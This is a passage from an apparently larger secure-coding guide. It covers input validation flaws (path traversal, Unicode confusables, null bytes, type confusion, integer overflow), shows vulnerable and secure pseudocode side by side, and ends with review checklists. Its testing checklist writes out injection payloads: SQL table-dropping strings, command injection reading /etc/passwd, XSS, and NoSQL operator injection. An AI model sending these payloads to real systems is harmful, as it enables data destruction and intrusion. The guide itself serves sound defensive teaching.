return {valid: false, error: "Invalid country code"}
function validateSortField(input):
// Exact match required
if input in ALLOWED_SORT_FIELDS:
return {valid: true, value: input}
return {valid: false, error: "Invalid sort field"}
function validateFileUpload(filename, content):
// Extension whitelist
extension = getExtension(filename).toLowerCase()
if extension not in ALLOWED_FILE_EXTENSIONS:
return {valid: false, error: "File type not allowed"}
// ALSO validate content type (magic bytes)
detectedType = detectFileType(content)
if detectedType.extension != extension:
return {valid: false, error: "File content doesn't match extension"}
// Additional: check file isn't actually executable or contains script
if containsExecutableContent(content):
return {valid: false, error: "File contains disallowed content"}
return {valid: true}
// For SQL column/table names (cannot be parameterized)
function validateColumnName(input, allowedColumns):
if input in allowedColumns:
return input // Safe to use in query
throw ValidationError("Invalid column name")
// Usage in query
function searchProducts(filters):
sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"])
sortOrder = filters.order == "desc" ? "DESC" : "ASC" // Binary choice
// Now safe to interpolate (they're from allowlist)
query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder
return database.query(query)
Why this is secure:
// SECURE: Normalize input before validation to prevent bypass
function validatePath(input):
// Step 1: Reject null bytes (used to bypass filters)
if contains(input, "\x00"):
return {valid: false, error: "Invalid character in path"}
// Step 2: Decode URL encoding (multiple rounds to catch double-encoding)
decoded = input
for i in range(3): // Max 3 rounds of decoding
newDecoded = urlDecode(decoded)
if newDecoded == decoded:
break // No more encoding to decode
decoded = newDecoded
// Step 3: Normalize path separators
normalized = decoded.replace("\\", "/")
// Step 4: Resolve path (remove . and ..)
resolved = resolvePath(normalized)
// Step 5: Check against allowed base directory
allowedBase = "/var/www/uploads/"
if not resolved.startsWith(allowedBase):
return {valid: false, error: "Path traversal detected"}
// Step 6: Check for remaining dangerous patterns
if contains(resolved, ".."):
return {valid: false, error: "Invalid path component"}
return {valid: true, value: resolved}
function validateUsername(input):
// Normalize Unicode before validation
// NFC = Canonical Composition (combines characters)
normalized = unicodeNormalize(input, "NFC")
// Check for confusable characters (homoglyphs)
if containsHomoglyphs(normalized):
return {valid: false, error: "Username contains confusable characters"}
// Now validate the normalized form
if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized):
return {valid: false, error: "Invalid username format"}
return {valid: true, value: normalized}
function validateUrl(input):
// Parse URL to get components
parsed = parseUrl(input)
if parsed is null:
return {valid: false, error: "Invalid URL"}
// Validate scheme (allowlist)
if parsed.scheme not in ["http", "https"]:
return {valid: false, error: "Only HTTP(S) URLs allowed"}
// Check for IP addresses (may be SSRF target)
if isIpAddress(parsed.host):
return {valid: false, error: "IP addresses not allowed"}
// Check for internal hostnames
if parsed.host.endsWith(".internal") or parsed.host == "localhost":
return {valid: false, error: "Internal URLs not allowed"}
// Check for credentials in URL
if parsed.username or parsed.password:
return {valid: false, error: "Credentials in URL not allowed"}
// Reconstruct URL from parsed components (normalizes encoding)
canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path)
return {valid: true, value: canonicalUrl}
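The URL checks above map fairly directly onto Python's `urllib.parse` and `ipaddress` modules. This is a sketch under assumptions: the function name, the decision to keep the query string, and the choice to drop the fragment are illustrative. It performs no DNS resolution, so a hostname that resolves to an internal address would still need a check after resolution.

```python
import ipaddress
from urllib.parse import urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}


def validate_url(raw: str) -> str:
    """Return a canonical URL or raise ValueError."""
    parts = urlsplit(raw)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("only HTTP(S) URLs allowed")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = parts.hostname  # lowercased, with brackets and port stripped
    if not host:
        raise ValueError("missing host")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # not an IP literal, continue with the hostname checks
    else:
        raise ValueError("IP addresses not allowed")
    if host == "localhost" or host.endswith(".internal"):
        raise ValueError("internal URLs not allowed")
    netloc = host if parts.port is None else f"{host}:{parts.port}"
    # Rebuild from parsed components; the fragment is intentionally dropped.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))
```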
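Why this is secure:
Path resolution removes `/./` and `/../` segments, and the scheme allowlist rejects schemes such as `file://` and `javascript:`.
// DANGEROUS: Validating before normalization allows bypass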
// Attack: Using decomposed Unicode characters
// "admin" can be represented as:
// - "admin" (5 ASCII characters)
// - "admin" with combining characters: "admin" + accent marks
// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a)
function vulnerableUsernameCheck(input):
if input == "admin":
return "Cannot register as admin"
return "OK"
// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a')
vulnerableUsernameCheck("аdmin") // Returns "OK"
// But displays as "admin" in UI!
// SECURE: Normalize and check for confusables
function secureUsernameCheck(input):
// Step 1: Unicode normalize to NFC
normalized = unicodeNormalize(input, "NFC")
// Step 2: Convert confusables to ASCII equivalent
ascii = convertConfusablesToAscii(normalized)
// Step 3: Check reserved names against ASCII version
reservedNames = ["admin", "root", "system", "administrator", "support"]
if ascii.toLowerCase() in reservedNames:
return {valid: false, error: "Reserved username"}
// Step 4: Only allow safe character set
if not isAsciiAlphanumeric(input):
return {valid: false, error: "Username must be ASCII letters and numbers"}
return {valid: true, value: normalized}
Detection: test with Unicode confusables (for admin/root), combining characters, and zero-width characters.
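Those test inputs can be tried against a small Python sketch built on the standard `unicodedata` module. Note one deliberate swap: it normalizes with NFKC, not the NFC form used in the pseudocode, so that compatibility forms such as fullwidth letters fold to ASCII before the reserved-name check. The function name and the ASCII-only policy are assumptions; stdlib Python has no confusables table, so the sketch rejects non-ASCII input outright.

```python
import unicodedata

RESERVED = {"admin", "root", "system", "administrator", "support"}


def check_username(raw: str) -> str:
    """Normalize, then enforce an ASCII-only policy and the reserved-name list."""
    normalized = unicodedata.normalize("NFKC", raw)
    if not normalized.isascii() or not normalized.isalnum():
        raise ValueError("username must be ASCII letters and numbers")
    if normalized.lower() in RESERVED:
        raise ValueError("reserved username")
    return normalized
```

A Cyrillic look-alike or a zero-width character fails the ASCII check, while fullwidth `ａｄｍｉｎ` normalizes to `admin` and is caught by the reserved list.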
// DANGEROUS: Null bytes can truncate strings in some languages
// Filename validation bypass with null byte
filename = "malicious.php\x00.jpg"
// In C/PHP, strcmp might only see "malicious.php\x00"
// The ".jpg" is ignored
if filename.endsWith(".jpg"):
uploadFile(filename) // Allows .php upload!
// Path validation bypass
path = "/safe/directory/../../etc/passwd\x00/safe/suffix"
// Validation sees: ends with "/safe/suffix" - looks OK
// File system sees: "/etc/passwd"
// SECURE: Strip null bytes first
function sanitizeInput(input):
// Remove null bytes entirely
sanitized = input.replace("\x00", "")
// Also remove other control characters
sanitized = removeControlCharacters(sanitized)
return sanitized
function validateFilename(input):
sanitized = sanitizeInput(input)
// Now validate
if sanitized != input:
return {valid: false, error: "Invalid characters in filename"}
// Continue with extension validation
// ...
Detection: test every string input with embedded null bytes (\x00, %00).
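For file paths specifically, the null-byte rejection combines naturally with a containment check. The Python sketch below is purely lexical and uses `posixpath` so that it behaves the same on any platform. `UPLOAD_ROOT` and the function name are assumptions, and because symlinks are not resolved, a real deployment would likely also compare `os.path.realpath` results.

```python
import posixpath

UPLOAD_ROOT = "/var/www/uploads"  # hypothetical base directory


def resolve_upload_path(user_path: str) -> str:
    """Join a user-supplied path onto UPLOAD_ROOT and confirm it stays inside."""
    if "\x00" in user_path:
        raise ValueError("null byte in path")
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, user_path))
    # commonpath compares whole components, so "/var/www/uploads-evil" is
    # not mistaken for a child of "/var/www/uploads" the way startswith would.
    if posixpath.commonpath([UPLOAD_ROOT, candidate]) != UPLOAD_ROOT:
        raise ValueError("path escapes upload directory")
    return candidate
```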
// DANGEROUS: Loose type comparison leads to bypass
// JavaScript/PHP style loose comparison
function vulnerableAuth(password):
storedHash = "0e123456789" // Some MD5 hashes start with "0e"
inputHash = md5(password)
// In PHP: "0e123456789" == "0e987654321" is TRUE!
// Both are interpreted as 0 * 10^(number) = 0
if inputHash == storedHash: // Loose comparison
return "Authenticated"
return "Failed"
// Type confusion with arrays
function vulnerablePasswordReset(token):
// Expected: token = "abc123def456"
// Attack: token = {"$gt": ""} (MongoDB injection via type confusion)
if database.findOne({"resetToken": token}):
return "Token found"
// SECURE: Strict type checking
function secureAuth(user, password):
storedHash = getStoredHash(user)
inputHash = hashPassword(password)
// Strict comparison and constant-time
if typeof(inputHash) != "string" or typeof(storedHash) != "string":
return "Failed"
if not constantTimeEquals(inputHash, storedHash):
return "Failed"
return "Authenticated"
function securePasswordReset(token):
// Enforce string type
if typeof(token) != "string":
return {valid: false, error: "Invalid token format"}
// Validate format
if not regex.match("^[a-f0-9]{64}$", token):
return {valid: false, error: "Invalid token format"}
// Now safe to query
result = database.findOne({"resetToken": token})
// ...
Detection: send arrays, objects, numbers, and booleans wherever a string is expected.
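The type and format checks on the reset token can be sketched in Python as follows. The function name is an assumption, and the 64-character lowercase hex format is taken from the pseudocode above. Anything that is not a string, including a decoded JSON object such as `{"$gt": ""}`, is rejected before any comparison or query takes place.

```python
import hmac
import re
from typing import Any

_TOKEN_RE = re.compile(r"[a-f0-9]{64}")


def is_valid_reset_token(candidate: Any, stored_token: str) -> bool:
    """Accept only a 64-char lowercase hex string equal to the stored token."""
    if not isinstance(candidate, str):  # rejects dicts, lists, numbers, booleans
        return False
    if not _TOKEN_RE.fullmatch(candidate):
        return False
    # Compare as bytes in constant time to avoid leaking match position.
    return hmac.compare_digest(candidate.encode("ascii"), stored_token.encode("utf-8"))
```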
// DANGEROUS: Validation passes but computation overflows
function vulnerablePurchase(quantity, price):
// Validate ranges
if quantity < 0 or quantity > 1000000:
return error("Invalid quantity")
if price < 0 or price > 1000000:
return error("Invalid price")
// Both pass validation, but multiplication overflows!
// quantity = 999999, price = 999999
// total = 999998000001 (exceeds 32-bit integer)
total = quantity * price // OVERFLOW
chargeCustomer(total) // May wrap to negative or small number
// SECURE: Check for overflow in computation
function securePurchase(quantity, price):
// Validate individual ranges
if not isValidInteger(quantity, 1, 1000):
return error("Invalid quantity")
if not isValidInteger(price, 1, 10000000): // in cents
return error("Invalid price")
// Check multiplication won't overflow
MAX_SAFE_TOTAL = 2147483647 // 32-bit signed max
if quantity > MAX_SAFE_TOTAL / price:
return error("Order total too large")
total = quantity * price // Now safe
// Additional business validation
if total > MAX_ALLOWED_TRANSACTION:
return error("Transaction exceeds limit")
chargeCustomer(total)
// Alternative: Use arbitrary precision arithmetic for money
function securePurchaseWithDecimal(quantity, price):
quantityDecimal = Decimal(quantity)
priceDecimal = Decimal(price)
total = quantityDecimal * priceDecimal // No overflow
if total > Decimal(MAX_ALLOWED_TRANSACTION):
return error("Transaction exceeds limit")
chargeCustomer(total)
Detection: test with MAX_INT, MAX_INT-1, boundary values, and combinations whose product overflows.
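Python integers do not overflow, but the total is often handed to a database column or payment API that does have a fixed width. The sketch below assumes a signed 32-bit downstream field and reuses the quantity and price ranges from the secure pseudocode above; `checked_total` is a hypothetical name.

```python
INT32_MAX = 2_147_483_647  # limit assumed for a downstream 32-bit field


def checked_total(quantity: int, price_cents: int) -> int:
    """Multiply only after proving the product fits in a signed 32-bit integer."""
    if not (1 <= quantity <= 1_000):
        raise ValueError("invalid quantity")
    if not (1 <= price_cents <= 10_000_000):
        raise ValueError("invalid price")
    # For positive integers this is equivalent to quantity * price_cents > INT32_MAX,
    # but it never forms the oversized product in fixed-width languages.
    if quantity > INT32_MAX // price_cents:
        raise ValueError("order total too large")
    return quantity * price_cents
```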
// WRONG: Validate after formatting
function displayUserData(userId):
userData = database.getUser(userId) // Raw from DB
// Format for display
formattedName = formatName(userData.name)
formattedBio = formatBio(userData.bio)
// Validating AFTER format - too late!
if containsHtml(formattedName): // Already formatted/escaped
return error("Invalid name")
return template.render(formattedName, formattedBio)
// CORRECT: Validate at input, encode at output
function saveUserData(request):
name = request.body.name
bio = request.body.bio
// Validate raw input BEFORE storing
if not isValidName(name):
return error("Invalid name")
if containsDangerousPatterns(bio):
return error("Invalid bio content")
// Store validated (but not encoded) data
database.saveUser({"name": name, "bio": bio})
function displayUserData(userId):
userData = database.getUser(userId)
// Encode for output context (don't validate again)
return template.render({
"name": htmlEncode(userData.name),
"bio": htmlEncode(userData.bio)
})
Why this is wrong:
// WRONG: String operations on binary data
function processUploadedImage(fileContent):
// Convert binary to string - CORRUPTS DATA
contentString = fileContent.toString("utf-8")
// String operations fail on binary
if contentString.startsWith("\x89PNG"): // May not work correctly
processImage(contentString) // Corrupted!
// Regex on binary data is meaningless
if regex.match("<script>", contentString): // False sense of security
return error("Invalid image")
// CORRECT: Use binary operations for binary data
function processUploadedImage(fileContent):
// Keep as binary buffer
buffer = fileContent // Raw bytes
// Check magic bytes using binary comparison
PNG_MAGIC = bytes([0x89, 0x50, 0x4E, 0x47]) // \x89PNG
JPEG_MAGIC = bytes([0xFF, 0xD8, 0xFF])
if buffer.slice(0, 4) == PNG_MAGIC:
imageType = "png"
else if buffer.slice(0, 3) == JPEG_MAGIC:
imageType = "jpeg"
else:
return error("Unsupported image format")
// Use dedicated image library for validation
try:
image = imageLibrary.load(buffer)
// Validate image properties
if image.width > MAX_WIDTH or image.height > MAX_HEIGHT:
return error("Image too large")
// Re-encode image (strips any embedded code)
cleanBuffer = imageLibrary.encode(image, imageType)
return {valid: true, content: cleanBuffer}
catch ImageError:
return error("Invalid image file")
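The magic-byte comparison translates directly to Python `bytes` operations. In Python the string-based approach fails even earlier, because decoding a PNG header as UTF-8 raises an error (0x89 is not a valid start byte). The table of signatures and the function name below are assumptions for illustration; a signature match only identifies the claimed type and does not replace loading and re-encoding the image with an image library.

```python
from typing import Optional

MAGIC_NUMBERS = {
    "png": b"\x89PNG\r\n\x1a\n",  # full 8-byte PNG signature
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the image type implied by the leading bytes, or None if unknown."""
    for image_type, magic in MAGIC_NUMBERS.items():
        if data.startswith(magic):
            return image_type
    return None
```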
Why this is wrong:
// WRONG: Different validation in different places
// API Endpoint 1: Strict validation
function createUserApi(request):
if not isValidEmail(request.email):
return error("Invalid email")
if not isStrongPassword(request.password):
return error("Weak password")
createUser(request.email, request.password)
// API Endpoint 2: No validation (developer forgot)
function createUserFromOAuth(oauthData):
// Trust OAuth provider's email
createUser(oauthData.email, generateRandomPassword())
// Internal function: Also no validation (assumes callers validated)
function createUserInternal(email, password):
// Directly insert to database - SQL injection if email not validated upstream
query = "INSERT INTO users (email, password) VALUES ('" + email + "', ?)"
database.execute(query, [password])
// CORRECT: Centralized validation
class UserValidator:
function validateEmail(email):
if email is null or email is empty:
throw ValidationError("Email required")
if length(email) > 254:
throw ValidationError("Email too long")
if not regex.match(EMAIL_PATTERN, email):
throw ValidationError("Invalid email format")
return email.toLowerCase().trim()
function validatePassword(password):
// ... password validation
return password
function validateUserData(data):
return {
"email": this.validateEmail(data.email),
"password": this.validatePassword(data.password)
}
// Single creation function used by all endpoints
function createUser(data):
validated = UserValidator.validateUserData(data)
// Now safe to use parameterized query
query = "INSERT INTO users (email, password) VALUES (?, ?)"
database.execute(query, [validated.email, hashPassword(validated.password)])
// All endpoints use the same function
function createUserApi(request):
createUser(request.body)
function createUserFromOAuth(oauthData):
createUser({"email": oauthData.email, "password": generateRandomPassword()})
Why this is wrong:
// Layer 1: Transport-level validation (before application code)
// - Request size limits
// - Content-Type checking
// - Rate limiting
// Typically configured in web server/framework
// Layer 2: Schema validation (structure and types)
function validateSchema(data, schema):
return schemaValidator.validate(data, schema)
// Layer 3: Format validation (syntax)
function validateFormats(data):
errors = []
if data.email and not isValidEmailFormat(data.email):
errors.append("Invalid email format")
if data.url and not isValidUrl(data.url):
errors.append("Invalid URL format")
return errors
// Layer 4: Business rule validation (semantics)
function validateBusinessRules(data, context):
errors = []
if data.endDate < data.startDate:
errors.append("End date must be after start date")
if data.quantity > context.inventory.available:
errors.append("Insufficient inventory")
return errors
// Orchestration
function validateRequest(request, schema, context):
// Layer 2: Schema
schemaResult = validateSchema(request.body, schema)
if not schemaResult.valid:
return {valid: false, errors: schemaResult.errors, layer: "schema"}
// Layer 3: Format
formatErrors = validateFormats(request.body)
if formatErrors.length > 0:
return {valid: false, errors: formatErrors, layer: "format"}
// Layer 4: Business rules
businessErrors = validateBusinessRules(request.body, context)
if businessErrors.length > 0:
return {valid: false, errors: businessErrors, layer: "business"}
return {valid: true, data: request.body}
// Define validators as composable functions
validators = [
(data) => checkRequired(data, ["email", "password"]),
(data) => checkTypes(data, {email: "string", password: "string"}),
(data) => checkLength(data.email, 1, 254),
(data) => checkLength(data.password, 12, 128),
(data) => checkFormat(data.email, EMAIL_PATTERN),
(data) => checkPasswordStrength(data.password),
(data) => checkEmailNotRegistered(data.email) // Async/DB check
]
function validatePipeline(data, validators):
for validator in validators:
result = validator(data)
if not result.valid:
return result // Short-circuit on first failure
return {valid: true, data: data}
// Usage
result = validatePipeline(requestData, validators)
if not result.valid:
return error(result.message)
processValidatedData(result.data)
// Define validation rules per field
FIELD_RULES = {
"email": {
required: true,
type: "string",
maxLength: 254,
format: "email",
transform: (v) => v.toLowerCase().trim()
},
"age": {
required: true,
type: "integer",
min: 0,
max: 150
},
"role": {
required: true,
type: "string",
enum: ["user", "admin", "moderator"]
},
"tags": {
required: false,
type: "array",
items: {
type: "string",
maxLength: 50,
pattern: "^[a-z0-9-]+$"
},
maxItems: 10
}
}
function validateFields(data, rules):
result = {}
errors = []
for fieldName, fieldRules in rules:
value = data[fieldName]
// Required check
if fieldRules.required and (value is null or value is undefined):
errors.append({field: fieldName, message: "Required"})
continue
// Skip optional empty fields
if value is null or value is undefined:
continue
// Type check
if typeof(value) != fieldRules.type:
errors.append({field: fieldName, message: "Invalid type"})
continue
// Apply transform if exists
if fieldRules.transform:
value = fieldRules.transform(value)
// Range/length checks based on type
error = validateFieldConstraints(value, fieldRules)
if error:
errors.append({field: fieldName, message: error})
continue
result[fieldName] = value
if errors.length > 0:
return {valid: false, errors: errors}
return {valid: true, data: result}
// 1. Request body used directly without validation
request.body.xxx // Search for: request\.body\.\w+
req.params.xxx // Search for: req\.params\.\w+
request.query.xxx // Search for: request\.query\.\w+
// 2. Missing null checks before property access
user.profile.address // Search for: \w+\.\w+\.\w+ (chained access without ?.)
data.items[0] // Search for: \w+\[\d+\] (hardcoded array index)
// 3. Type coercion without validation
parseInt(xxx) // Search for: parseInt\([^,]+\) (no radix)
Number(xxx) // Search for: Number\(\w+
parseFloat(xxx) // Without subsequent isNaN check
// 4. Regex without anchors
/pattern/ // Search for: /[^/^][^$]+[^$/]/ (no ^ or $)
new RegExp("xxx") // Search for: new RegExp\("[^^]
// 5. Client-side validation only
if (form.valid) // Look for validation in frontend, missing in backend
validate() // In JS files, search corresponding backend endpoint
// 6. Array access from user input
array[userInput] // Search for: \[\w+\.\w+\] (property access with user data)
object[key] // Where key comes from request
// GREP patterns for security review:
// request\.(body|params|query)\.\w+
// parseInt\([^,)]+\)   (single-argument call, i.e. no radix)
// \.\w+\.\w+\.\w+(?!\?)
// /[^/]+/(?!.*[^\\]\$)
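
The search patterns above can be applied mechanically during review. The following is a minimal Python sketch, not a substitute for a real SAST tool: the rule names and the `scan_source` helper are hypothetical, and the regexes are simplified versions of the ones listed, so expect both false positives and misses.

```python
import re

# Simplified review heuristics. Rule names are illustrative only and do not
# come from any existing tool.
RULES = {
    "unvalidated-request-access": re.compile(
        r"\breq(?:uest)?\.(?:body|params|query)\.\w+"
    ),
    # Matches parseInt(...) only when there is no comma, i.e. no radix argument.
    "parseInt-without-radix": re.compile(r"\bparseInt\([^,()]+\)"),
    "numeric-array-index": re.compile(r"\w+\[\d+\]"),
}


def scan_source(text):
    """Return (line_number, rule_name, line) for every heuristic match."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append((number, name, line.strip()))
    return findings


if __name__ == "__main__":
    sample = "const id = parseInt(req.params.id)\nconst n = parseInt(raw, 10)\n"
    for finding in scan_source(sample):
        print(finding)
```

Each finding is a prompt for a human to check whether validation happens upstream, not proof of a vulnerability.
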
// Automated validation testing checklist:
// 1. Boundary testing
- Test with null, undefined, empty string for all fields
- Test with max length + 1 characters
- Test with min - 1 and max + 1 for numeric ranges
- Test with integer overflow values (2^31, 2^32, 2^64)
// 2. Type confusion testing
- Send array where string expected: {"email": ["test@test.com"]}
- Send object where string expected: {"email": {"$gt": ""}}
- Send number where string expected: {"email": 12345}
- Send boolean where string expected: {"email": true}
// 3. Encoding bypass testing
- URL encoding: %00, %2e%2e%2f
- Unicode encoding: \u0000, \u002e
- Double encoding: %2500
- Mixed case: %2E%2e%2F
// 4. Injection payload testing
- SQL: ' OR '1'='1, '; DROP TABLE users; --
- Command: ; ls, | cat /etc/passwd, `whoami`
- Path: ../../../etc/passwd, ....//....//
- XSS: <script>alert(1)</script>, javascript:alert(1)
// 5. ReDoS testing
- For each regex, test with pattern: (valid_char * 30) + invalid_char
- Measure response time - should be < 100ms
- Exponential time indicates ReDoS vulnerability
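
The ReDoS check in step 5 can be automated with a small timing harness. This is a sketch under stated assumptions: `time_regex` and `growth_profile` are hypothetical helper names, and the input sizes are deliberately kept far below 30 for the vulnerable pattern, because a genuinely exponential regex would run for a very long time at that size.

```python
import re
import time


def time_regex(pattern, valid_char, repeat, invalid_char="!"):
    """Time one match attempt against (valid_char * repeat) + invalid_char."""
    probe = valid_char * repeat + invalid_char
    compiled = re.compile(pattern)
    start = time.perf_counter()
    compiled.match(probe)
    return time.perf_counter() - start


def growth_profile(pattern, valid_char, sizes):
    """Return elapsed seconds per input size so the growth rate can be inspected."""
    return {size: time_regex(pattern, valid_char, size) for size in sizes}


if __name__ == "__main__":
    # Nested quantifier: backtracking work roughly doubles per extra character.
    print(growth_profile(r"^(a+)+$", "a", [10, 14, 18]))
    # A pattern for the same language without nesting stays fast at size 30.
    print(growth_profile(r"^a+$", "a", [10, 14, 18, 30]))
```

When the measured time multiplies with each small increase in size, treat the pattern as vulnerable and rewrite it rather than raising the timeout.
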
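This document covers in depth the six most critical and most common security vulnerabilities in AI-generated code. Together, these patterns are the root cause of the vast majority of security incidents in AI-assisted development.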
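| # | Pattern | Risk Level | AI Frequency | Primary Threats |
|---|---|---|---|---|
| 1 | Hardcoded Secrets | Critical | Very High | Credential theft, API abuse, data breaches |
| 2 | SQL/Command Injection | Critical | High | Database compromise, remote code execution, system takeover |
| 3 | Cross-Site Scripting (XSS) | High | Very High | Session hijacking, account takeover, defacement |
| 4 | Authentication/Session | Critical | High | Complete authentication bypass, privilege escalation |
| 5 | Cryptographic Failures | High | Very High | Data decryption, credential exposure, forgery |
| 6 | Input Validation | High | Very High | Enables all other injection attacks |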
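They are interconnected: input validation failures enable injection attacks; cryptographic failures expose the secrets that hardcoded credentials were guarding; authentication weaknesses make XSS more damaging.
AI models struggle with all of them: training data contains countless examples of insecure patterns. AI models optimize for "working code", not "secure code". The patterns that make code secure are often invisible (environment variables, parameterized queries, correct encoding), while insecure patterns are explicit and visible.
They compound: a single hardcoded secret can expose thousands of users; a single SQL injection can compromise an entire database; a single XSS vulnerability can persist across sessions and users.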
These concise checklists provide a quick reference for each pattern. Use them during code review or before committing changes.
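| ✓ | Checkpoint |
|---|---|
| □ | No API keys, passwords, or tokens in source files |
| □ | All secrets loaded from environment variables or a secrets manager |
| □ | `.env` files listed in `.gitignore`, with a `.env.example` template provided |
| □ | No secrets in logs, error messages, or URLs |
| □ | Secret scanning enabled in the CI/CD pipeline |
| □ | Credentials rotated regularly, with rotation automated |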
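
As an illustration of the second and fourth checkpoints, here is a minimal Python sketch of loading a secret from the environment and failing fast when it is absent. The helper `require_secret`, the exception class, and the variable name `PAYMENT_API_KEY` are hypothetical; a secrets manager client would fill the same role in a real deployment.

```python
import os


class MissingSecretError(RuntimeError):
    """Raised when a required secret is not configured."""


def require_secret(name, environ=None):
    """Return the secret stored in the environment variable `name`.

    Fails fast instead of falling back to a hardcoded default, so a
    misconfigured deployment cannot silently run with a placeholder key.
    """
    source = os.environ if environ is None else environ
    value = source.get(name, "")
    if not value.strip():
        # Report only the variable name, never a secret value.
        raise MissingSecretError(f"Required secret {name} is not set")
    return value


if __name__ == "__main__":
    try:
        api_key = require_secret("PAYMENT_API_KEY")  # hypothetical variable name
        print("secret loaded")  # never print the value itself
    except MissingSecretError as exc:
        print(exc)
```

The optional `environ` argument exists only so the function can be tested without touching the real process environment.
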
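| ✓ | Checkpoint |
|---|---|
| □ | All SQL queries use parameterized statements (no string concatenation) |
| □ | Dynamic identifiers (table/column names) validated against an allowlist |
| □ | ORM queries reviewed for raw-query vulnerabilities |
| □ | Shell commands avoid user input; where unavoidable, validate against an allowlist |
| □ | Second-order injection checked (stored data used in queries) |
| □ | Prepared statements used for all query types (SELECT, INSERT, ORDER BY) |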
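
The first two checkpoints combine as follows in a short Python sketch using the standard `sqlite3` module. The `users` schema, the `SORTABLE_COLUMNS` allowlist, and the function name are assumptions made for illustration. Values are bound with `?`; the ORDER BY column cannot be bound as a parameter, so it is only interpolated after an allowlist check.

```python
import sqlite3

# Allowlist of columns that may be used for sorting (hypothetical schema).
SORTABLE_COLUMNS = {"email", "created_at"}


def find_users_by_role(conn, role, sort_by="email"):
    """Return emails of users with the given role, sorted by an allowed column."""
    if sort_by not in SORTABLE_COLUMNS:
        raise ValueError(f"Unsupported sort column: {sort_by!r}")
    # Identifiers cannot be bound as parameters, so only an allowlisted name
    # is interpolated. The user-supplied value is always bound with ?.
    query = f"SELECT email FROM users WHERE role = ? ORDER BY {sort_by}"
    return [row[0] for row in conn.execute(query, (role,))]


if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, role TEXT, created_at TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("a@example.com", "admin", "2024-01-03"),
    )
    print(find_users_by_role(conn, "admin"))
    # The payload is treated as a literal role name and matches nothing.
    print(find_users_by_role(conn, "' OR '1'='1"))
```
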
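| ✓ | Checkpoint |
|---|---|
| □ | HTML encoding for HTML body context |
| □ | Attribute encoding for HTML attributes (especially event handlers) |
| □ | JavaScript encoding for inline scripts |
| □ | URL encoding for URL contexts |
| □ | CSP header configured with a strict policy (no `unsafe-inline`) |
| □ | `innerHTML` avoided; use `textContent` or framework-safe bindings |
| □ | Sanitization library tested against mutation XSS |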
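
The first four checkpoints each call for a different encoder. The sketch below shows one possible mapping onto the Python standard library; the function names are hypothetical, and a templating engine with auto-escaping would normally do this work. It assumes attribute values are always wrapped in quotes in the surrounding template.

```python
import html
import json
from urllib.parse import quote


def encode_html_body(value):
    """Escape &, <, > for text placed between HTML tags."""
    return html.escape(value, quote=False)


def encode_html_attribute(value):
    """Also escape both quote characters so the value cannot close a quoted attribute."""
    return html.escape(value, quote=True)


def encode_js_string(value):
    """Return a quoted JavaScript string literal that is safe inside <script>."""
    literal = json.dumps(value)  # handles quotes, backslashes, control characters
    # Escape <, >, & so a payload such as "</script>" cannot end the script block.
    return (
        literal.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def encode_url_component(value):
    """Percent-encode a value for use as a single query or path component."""
    return quote(value, safe="")


if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    print(encode_html_body(payload))
    print(encode_js_string(payload))
    print(encode_url_component("a b&c=d/e"))
```

Percent-encoding a component does not make a whole URL safe: a `javascript:` scheme in a link target still has to be rejected by a separate scheme check.
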
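| ✓ | Checkpoint |
|---|---|
| □ | Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) |
| □ | Session tokens generated with a cryptographically secure random source (256+ bits of entropy) |
| □ | JWT algorithm explicitly validated (`alg: none` rejected) |
| □ | Tokens stored in HttpOnly, Secure, SameSite cookies |
| □ | Sessions invalidated on logout (server-side) |
| □ | Constant-time comparison for password/token verification |
| □ | Rate limiting on authentication endpoints |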
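
Three of these checkpoints (token generation, cookie flags, constant-time comparison) can be sketched with the Python standard library alone. The function names, the cookie name `session`, and the one-hour lifetime are assumptions for illustration; password hashing is left out because bcrypt and Argon2 require third-party packages.

```python
import hmac
import secrets


def new_session_token():
    """Return a URL-safe token built from 32 random bytes (256 bits) of OS entropy."""
    return secrets.token_urlsafe(32)


def tokens_match(presented, expected):
    """Compare two tokens in constant time to avoid leaking a timing signal."""
    return hmac.compare_digest(presented.encode("utf-8"), expected.encode("utf-8"))


def session_cookie_header(token, max_age_seconds=3600):
    """Build a Set-Cookie value with the HttpOnly, Secure, and SameSite flags."""
    return (
        f"session={token}; Max-Age={max_age_seconds}; Path=/; "
        "HttpOnly; Secure; SameSite=Strict"
    )


if __name__ == "__main__":
    token = new_session_token()
    print(session_cookie_header(token))
    print(tokens_match(token, token))
```
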
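| ✓ | Checkpoint |
|---|---|
| □ | Symmetric encryption uses AES-256-GCM or ChaCha20-Poly1305 |
| □ | A fresh random IV/nonce for every encryption operation |
| □ | CSPRNG used for all security-sensitive random values |
| □ | bcrypt/Argon2id used for password hashing (in preference to PBKDF2) |
| □ | Key derivation uses HKDF, or PBKDF2 with an appropriate iteration count |
| □ | No ECB mode, no static IVs, no Math.random() |
| □ | Constant-time comparison for MAC/signature verification |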
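
The key derivation and MAC verification checkpoints can be illustrated with the Python standard library. This is a sketch, not a complete encryption scheme: the function names are hypothetical, and the iteration count is an assumption that should be tuned to the deployment hardware.

```python
import hashlib
import hmac
import secrets

# Assumption: a starting point for PBKDF2-HMAC-SHA256; tune to your hardware.
PBKDF2_ITERATIONS = 600_000


def derive_key(passphrase, salt=None, iterations=PBKDF2_ITERATIONS):
    """Derive a 32-byte key from a passphrase; returns (key, salt)."""
    if salt is None:
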